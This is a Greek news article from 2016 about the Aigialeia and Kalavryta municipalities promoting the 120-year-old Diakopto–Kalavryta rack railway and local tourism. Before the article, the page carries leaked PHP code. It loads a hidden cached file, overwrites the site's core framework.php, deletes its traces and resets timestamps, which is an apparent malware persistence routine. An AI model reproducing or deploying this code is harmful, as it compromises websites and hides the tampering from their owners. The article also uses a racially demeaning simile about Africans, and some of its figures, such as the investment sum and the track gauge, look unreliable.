$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Επιδιώκουν Κοινή Ανάπτυξη οι Δήμοι Αιγιαλείας & Καλαβρύτων
YT Expo - шаблон joomla Mp3
Εκτύπωση
PDF
23
Ιούνιος
2016

Επιδιώκουν Κοινή Ανάπτυξη οι Δήμοι Αιγιαλείας & Καλαβρύτων


 

XΩΡΙΣ ΝΑ ΕΠΙΔΙΩΚΕΤΑΙ η συνένωσή τους σε ένα Δήμο (κατά το πρότυπο της Ιεράς Μητροπόλεως Καλαβρύτων και Αιγιαλείας), οι δήμαρχοι κ.κ. Γεώρ.  Λαγγουράς (Καλαβρύτων) και  Θανάσης Παναγοπουλος (Αιγιαλείας), τα δημοτικά συμβούλια και οι πολιτιστικοί φορείς που δραστηριοποιούνται πολύ δημιουργικά, έχουν προχωρήσει σε ενέργειες, αναδεικνύοντας  κοινά εδαφολογικά και πολιτιστικά σημεία , των οποίων

 

 

επιδιώκουν την προβολή για ανάπτυξη.

 

ΜΙΑ ΑΠΟ ΤΙΣ, από κοινού ενέργειες ήταν η περαιτέρω προβολή του Βουραϊκού και του , μοναδικού συρμού, του οδοντωτού, ο οποίος επί 120 χρόνια «ορειβατεί» ανεβαίνοντας τα 20 χιλιόμετρα στα 750 μ. υψόμετρο, όλες τις εποχές, ακόμη και όταν οι αυτοκινητόδρομοι κλείνουν από χιόνια, πάγους ή καταπτώσεις και δεν απομονώνονται τα ορεινά Καλάβρυτα από την παραθαλάσσια ζώνη του Διακοπτού, με τις ευεργετικές επιπτώσεις στη διακίνηση του πληθυσμού, των εμπορευμάτων και του εμπορίου γενικότερα.

 

Η ΠΟΛΥΣΥΖΗΤΗΜΕΝΗ έννοια της ανάπτυξης, υλοποιείται με πρόκληση κεφαλαίων και επιχειρηματιών να επενδύσουν στην περιοχή με άξονα τον τουρισμό αφού το χιονοδρομικό Καλαβρύτων διεκδικεί την πρώτη θέση ανάμεσα στα άλλα όμοια των βουνών της Ελλάδας, το Σπήλαιο στα Καστριά με το τεράστιο ενδιαφέρον που παρουσιάζει είναι ό άλλος πόλος έλξης των επισκεπτών. Η ιστορικότητα δε της περιοχής με τις ηρωικές Μονές Μεγάλου Σπηλαίου και Αγίας Λαύρας  και η φρικτή εκτέλεση των Καλαβρυτινών (1943)  από τα Ναζιστικά στρατεύματα Κατοχής κατά τον Β’ Παγκόσμιο Πόλεμο, όλα μαζί και καθένα χωριστά, σε εθνικό επίπεδο, συνιστούν πόλους έλξης του ενδιαφέροντος Ελλήνων και Ξένων περιηγητών, με το συνακόλουθο οικονομικό όφελος για την περιοχή.

 

ΣΗΜΕΡΑ τα πράγματα είναι πολύ βελτιωμένα. Μεγάλο έργο ανάπτυξης είναι η  ανανέωση του οδοντωτού με καινούργιο συρμό πιο μεγάλο και πιο δυνατό από τον παλαιό και αγαπημένο «μουτζούρη» που χρησιμοποιούσε τον ατμό για κινητήρια δύναμη και είχε περιορισμένη δυνατότητα  μεταφοράς προσώπων και εμπορευμάτων, για μεγάλο διάστημα άνθρωποι και προϊόντα και ζώα στη σκευοφόρο να συνταξιδεύουν και στις κλειστές γαλαρίες να μπαίνει από τα ανύπαρκτα παράθυρα ο καπνός από το κάρδιφ που καιγόταν στη μηχανή, με συνέπεια  πολλοί από τους λαϊκούς επιβάτες να βγαίνουν στο Διακοφτό, περίπου ως Αφρικανοί. Κατάμαυροι. Υπήρχαν βέβαια και θέσεις με κλειστά παράθυρα αλλά ήταν λίγες. Σήμερα με την παραγγελία και εν χρήσει πλέον μια ντιζελομηχανή μεγάλης δυνάμεως ανεβοκατεβάζει δυο μεγάλα και πολυτελέστατα βαγόνια και είναι απόλαυση να ταξιδεύεις. Άλλωστε η απόσταση είναι στα 20 χιλιόμετρα και ο χρόνος για να φτάσεις στα Καλάβρυτα από Διακοφτό σε μια ώρα.

 

ΤΟ ΠΑΛΙΟ-ΙΣΤΟΡΙΚΟ τραινάκι δε λησμονήθηκε. Από τις 4 μηχανές του η μία έχει πλήρως επισκευαστεί το 2015 και είναι σε θέση να ανεβοκατεβάσει το ένα βαγόνι της. Είναι τουριστικό αξιοθέατο στο σταθμό των Καλαβρύτων. Οι πολλοί φίλοι του οδοντωτού από τα Καλάβρυτα και την Αιγιάλεια έχουν οργανωθεί σε σύλλογο ως οι «Φίλοι του Οδοντωτού» και διατηρούν ζωντανό το τραινάκι στη μνήμη των σημερινών νέων που δεν γνώρισαν τις χίλιες χαρές και τους καημούς των ταξιδιών του. Πάνω σ’ αυτές τις μηχανές ανάλωσαν την επαγγελματική τους ζωή και διακρίθηκαν για την αξιοσύνη τους ηρωικοί μηχανοδηγοί που συνδέονται με πολλά περιστατικά στο ταξίδι μέσα στη χαράδρα, δίπλα στο βουερό ποτάμι που το χειμώνα είναι φοβερό με τα νερά που κατεβάζει από το Χελμό, όταν μάλιστα λιώνουν τα χιόνια.

 

Η ΕΠΕΝΔΥΣΗ, κάπου 10 δισ ευρώ για την ανανέωση της γραμμής, έργων στήριξης και προμήθειας νέων αυτοκινηταμαξών, δίνει νέα ζωή, για το μέλλον του οδοντωτού, ο οποίος είναι το μοναδικό στον κόσμο ορεινό τραινάκι που κινείται σε πολύ στενές γραμμές, πλάτους 0,75 εκατοστών και σε μερικά σημεία που η ανωφέρεια είναι μεγάλη χρησιμοποιεί και εσωτερική οδόντωση για να  ξεπεράσει κλίση 17,5  %. Είναι χαρά και απόλαυση να ταξιδεύεις με το τραινάκι Διακοφτό – Καλάβρυτα. Συλλέγεις καταπληκτικές εμπειρίες από τη βλάστηση του  φαραγγιού, ανάλογα με την εποχή. Είναι, οικολογικά, προστατευόμενη περιοχή. Και να μην το ματιάσουμε έχει αποφευχθεί πυρκαγιά που θα το απογύμνωνε τραγικά.

 

ΣΕ ΜΙΑ ΠΡΟΣΚΛΗΣΗ δημοσιογράφων από τον Τύπο και την Τηλεόραση, οι δήμαρχοι Καλαβρύτων κ.  Γεώργ. Λαγγουράς και Αιγίου . Θανάσης Παναγόπουλος, παρισταμένου και του Περιφερειάρχη κ. Αποστ. Κατσιφάρα, Αντιδημάρχων και άλλων παραγόντων, με την παρουσία τους και τις δηλώσεις τους, τροφοδότησαν τα μέσα προβολής και δημοσιότητος με το κατάλληλο πληροφοριακό και οπτακουστικό υλικό και με την παράκληση να προβάλουν τη φυσική και τουριστική αξία της περιοχής Καλαβρύτων και Αιγιαλείας, συνολικά, προκειμένου να επιτευχθεί η ανάπτυξη με οποιοδήποτε τρόπο.

 

ΠΕΡΑ ΑΠΟ ΤΟ ΟΡΓΑΝΩΤΙΚΟ πνεύμα της ΔΗΚΕΠΑ που είχε αναλάβει τη διεξαγωγή της φιλοξενίας και ξενάγησης των δημοσιογράφων, τόσο στο σταθμό Διακοφτού όσο και στην πόλη των Καλαβρύτων η χαρακτηριστική εντύπωση που αποκόμισαν οι εκπρόσωποι των ΜΜΕ, ήταν η άψογη καθαριότητα των χώρων, εντός και εκτός των σιδ. Σταθμών. Δε μιλάμε για καθαρούς δρόμους αλλά για…σφουγγαρισμένους δρόμους και παράδρομους, για λειτουργικές και κατακάθαρες τουαλέτες και για πρόθυμη συμπεριφορά των αρμόδιων υπαλλήλων. Τα Καλάβρυτα δε θα τα βρουν όπως τα θυμούνται οι σχετικά παλιότεροι και νεότεροι. Έχουν πλήρως αλλάξει. Είναι μια φροντισμένη μικρόπολη στην ορεινή ζώνη με ανεπτυγμένα ενδιαφέροντα και άλλα προς αξιοποίηση στοιχεία, για τα οποία καλούνται οι επενδυτές να δημιουργήσουν νέες παραγωγικές επιχειρήσεις στην περιοχή.

 

ΦΕΤΟΣ, Ο ΜΑΗΣ ΜΗΝΑΣ,ήταν αφιερωμένος στον Οδοντωτό. Επίσης στο φαράγγι του Βουραϊκού με πεζοπορία  ( καθιερωμένο ετήσιο πέρασμα του Βουραϊκού) με γεύσεις Καλαβρυτινές και με ημερίδες, ενημέρωσης και ανάδειξης του τοπικού λαϊκού πολιτισμού και της ένδοξης ιστορικότητάς του. Για όσους αγαπάνε το τρένο, ο οδοντωτός Διακοπτού – Καλαβρύτων είναι ένα μαγικό ταξίδι στο τοπίο και στο χρόνο. Το υπουργείο Τουρισμού, η   ΤΡΑΙΝΟΣΕ, η ΔΗΚΕΠΑ Αιγιαλείας και ο Δήμος Καλαβρύτων, συνεργάστηκαν παραγωγικά και πρόσφεραν πλούσιο σε εμπειρίες και ταξιδιωτική απόλαυση πρόγραμμα, σε μαθητικές ομάδες και ηλικιωμένους με έκπτωση επί του εισιτηρίου, στην επέτειο των 120 χρόνων συνεχούς λειτουργίας του συρμού. Ιδιαίτερα ο Δήμος Αιγιαλείας εκμεταλλεύτηκε το γεγονός και στο πλαίσιο του προγράμματος «Οινοξένεια 2016»-Τοπία και γεύσεις της Αιγιάλειας, πρόβαλε τις τοπικές οινοβιομηχανίες με έξυπνες παρουσιάσεις στο σταθμό Διακοφτού και με δωρεάν κεράσματα εκλεκτών κρασιών από τους αμπελώνες της περιοχής.

 

ΣΥΝΟΨΙΖΟΝΤΑΣ, ο Οδοντωτός σιδηρόδρομος 120 χρόνια  μας ταξιδεύει, μας ενώνει, μας εμπνέει. Το πρόγραμμα «Εν Συρμώ» - Μάης 2016, καθιερώνει, με τις φετινές εκδηλώσεις, μια εξαιρετικά ενδιαφέρουσα περιφερειακή γιορτή, που συγκεντρώνει το Πανελλήνιο αλλά και το ευρύτερα τουριστικό ενδιαφέρον, στο τμήμα αυτό της βόρειας Πελοποννήσου, όπου η απόσταση από το κύμα στο χιόνι έχει σχεδόν εκμηδενιστεί με το σύγχρονο και δυνατό Οδοντωτό, που συνδέει της δυο επαρχίες, Αιγιαλείας και Καλαβρύτων.